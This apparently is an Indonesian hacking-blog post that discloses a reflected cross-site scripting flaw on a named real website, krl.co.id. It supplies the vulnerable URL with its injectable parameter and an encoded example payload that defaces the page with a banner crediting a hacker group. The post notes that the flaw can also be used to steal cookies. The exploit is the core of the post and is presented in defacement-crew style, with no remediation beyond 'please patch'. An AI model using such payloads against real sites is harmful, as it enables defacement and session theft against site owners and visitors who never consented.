{PoC}XSS Vulnerability in KRL Care Center

Terdapat celah keamanan yang kritis berupa Cross Site Scripting yang bersifat Non-Persistent pada Website KRL Care Center. Walaupun tidak terlalu berbahaya, celah keamanan ini dapat menyebabkan XSS Defacing secara temporer ataupun hanya sekedar mencuri cookie saja. Sayangnya celah XSS ini hanya berjalan pada beberapa Web Browser saja.

Proof of Concept :
http://www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=Sisipkan Script Di Sini&kode_kondisi=0

Contoh : http://www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=document.body.innerHTML%3D"<h1>XSS+Defacing<%2Fh1>This+Site+Has+XSSed+By+%3A+X-Cisadane<br%2F>Greetz+To+%3A+XCode%2C+Hacker+Cisadane%2C+Depok+Cyber%2C+

Muslim+Hackers%2C

+Dunia+Santai%2C+Borneo+Crew%2C+Jiban+Crew%2C+

etc<br%2F>Please+patch+your+system"%3B<%2Fscript>&kode_kondisi=0

Source: here

Ads by Google

{PoC}XSS Vulnerability in KRL Care Center

No comments:

About Me

Recent Posts

Follow Us

Popular Posts

Categories

About

Tags

Popular Posts

Ads by Google

{PoC}XSS Vulnerability in KRL Care Center

You Might Also Like

No comments:

About Me

Recent Posts

Follow Us

Popular Posts

Categories

About

Tags

Popular Posts